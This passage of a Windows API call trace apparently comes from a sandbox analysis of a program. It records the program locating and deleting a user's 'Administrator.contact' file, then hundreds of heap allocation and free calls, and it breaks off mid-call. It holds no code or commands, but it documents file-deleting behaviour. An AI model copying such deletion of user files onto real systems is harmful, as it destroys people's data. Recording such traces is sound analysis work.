GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x3c [0029.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x116e0140, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x7c2240 [0029.434] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 1 [0029.436] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x116e0140, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0 [0029.436] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.436] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0029.436] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.437] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.438] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af408 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.438] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.440] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.440] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.441] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.442] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 